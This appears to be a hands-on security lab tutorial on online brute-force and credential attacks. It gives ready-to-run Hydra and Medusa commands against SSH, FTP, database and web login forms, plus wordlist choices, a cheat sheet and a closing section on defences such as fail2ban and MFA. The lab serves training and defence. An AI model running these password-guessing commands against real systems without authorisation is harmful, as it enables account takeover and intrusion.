๐ŸŽฏ Lab Objectives

  • Understand what brute-force and credential-stuffing attacks are
  • Use Hydra to attack SSH, FTP, and web login forms
  • Choose the right wordlist for the target
  • Understand how defenders detect and stop these attacks
โš ๏ธ
Only run Hydra against systems you own or have explicit written permission to test. Unauthorised brute-force attacks are illegal in most countries.

Step 1 โ€” How Hydra Works

Hydra tries username/password combinations against a live service as fast as possible. It supports 50+ protocols including SSH, FTP, HTTP, SMTP, RDP, MySQL, and more.

# Hydra basic syntax
hydra [OPTIONS] TARGET SERVICE

# Key flags:
-l username      โ†’ single username
-L file.txt      โ†’ list of usernames
-p password      โ†’ single password
-P file.txt      โ†’ list of passwords (wordlist)
-t 4             โ†’ number of parallel tasks (threads)
-f               โ†’ stop after first valid login found
-V               โ†’ verbose (show each attempt)
-o output.txt    โ†’ save results to file

Step 2 โ€” SSH Brute Force

# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

# Username list + password list
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

# Try common passwords on many usernames
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
      -P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt \
      -t 4 -f ssh://192.168.1.10

# Custom port
hydra -l root -P rockyou.txt -s 2222 ssh://192.168.1.10

# Successful result looks like:
[22][ssh] host: 192.168.1.10   login: admin   password: password123

Step 3 โ€” FTP Brute Force

# FTP brute force
hydra -l ftp -P rockyou.txt ftp://192.168.1.10

# Try anonymous login first (before brute-forcing)
ftp 192.168.1.10
# Username: anonymous
# Password: (blank or your@email.com)

# Other common services
hydra -l admin -P rockyou.txt telnet://192.168.1.10
hydra -l admin -P rockyou.txt smtp://192.168.1.10
hydra -l root  -P rockyou.txt mysql://192.168.1.10

Step 4 โ€” HTTP Login Form Brute Force

This is trickier โ€” you need to identify the form parameters and what a failed login looks like.

# Step 1: Find the form fields using browser DevTools or Burp Suite
# Right-click login form โ†’ Inspect โ†’ look for input names
# e.g. username=admin&password=test

# HTTP POST form โ€” http-post-form module
# Format: "PATH:BODY:FAIL_STRING"
hydra -l admin -P rockyou.txt 192.168.1.10 \
  http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# ^USER^ and ^PASS^ are Hydra's placeholders
# "Invalid credentials" = text that appears on FAILED login

# HTTP GET form (less common)
hydra -l admin -P rockyou.txt 192.168.1.10 \
  http-get-form "/login?user=^USER^&pass=^PASS^:F=Login failed"

# HTTP Basic Authentication (pop-up login box)
hydra -l admin -P rockyou.txt http-get://192.168.1.10/admin

Step 5 โ€” Choosing the Right Wordlist

# Location of wordlists on Kali
ls /usr/share/wordlists/
ls /usr/share/seclists/

# Install SecLists (comprehensive collection)
sudo apt install seclists -y

# Recommended wordlists by use case:
# Quick test (top passwords):
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt

# SSH / general service:
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

# Full rockyou (14 million, slow):
/usr/share/wordlists/rockyou.txt

# Usernames:
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/Names/names.txt

# Generate custom wordlist with crunch
crunch 6 8 abcdefghijklmnopqrstuvwxyz0123456789 -o custom.txt

# Generate from target keywords with cewl
cewl https://example.com -d 2 -m 5 -w cewl_wordlist.txt

Step 6 โ€” Medusa (Hydra Alternative)

# Medusa is another brute-force tool, faster on some protocols
sudo apt install medusa -y

# SSH brute force with Medusa
medusa -h 192.168.1.10 -u admin -P rockyou.txt -M ssh

# Multiple hosts from file
medusa -H hosts.txt -u admin -P rockyou.txt -M ftp -t 10

Step 7 โ€” Defence Against Brute Force

# How defenders stop brute-force attacks:

# 1. Account lockout โ€” lock account after N failed attempts
# fail2ban automatically blocks IPs after failures:
sudo apt install fail2ban
# /etc/fail2ban/jail.conf โ†’ maxretry = 3, bantime = 3600

# 2. Rate limiting
# nginx limit_req_zone limits login attempts per IP per second

# 3. SSH key authentication (disable password auth)
# /etc/ssh/sshd_config:
# PasswordAuthentication no
# PubkeyAuthentication yes

# 4. Change default ports
# SSH on port 22 gets hammered constantly
# Moving to port 2222 reduces noise by 90%+

# 5. MFA / Two-Factor Authentication
# Even if password is found, attacker needs the second factor

๐Ÿ“‹ Hydra Cheat Sheet

ServiceCommand
SSHhydra -l user -P pass.txt ssh://TARGET
FTPhydra -l user -P pass.txt ftp://TARGET
Telnethydra -l user -P pass.txt telnet://TARGET
HTTP POSThydra TARGET http-post-form "/login:u=^USER^&p=^PASS^:F=failed"
HTTP Basichydra -l user -P pass.txt http-get://TARGET/admin
MySQLhydra -l root -P pass.txt mysql://TARGET
RDPhydra -l admin -P pass.txt rdp://TARGET
SMTPhydra -l user -P pass.txt smtp://TARGET
โœ…
Lab Complete! You now know how to perform and defend against online brute-force attacks. Combine this with password cracking (offline) for a complete credential-attack toolkit.
Related: Password Cracking โ†’ โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands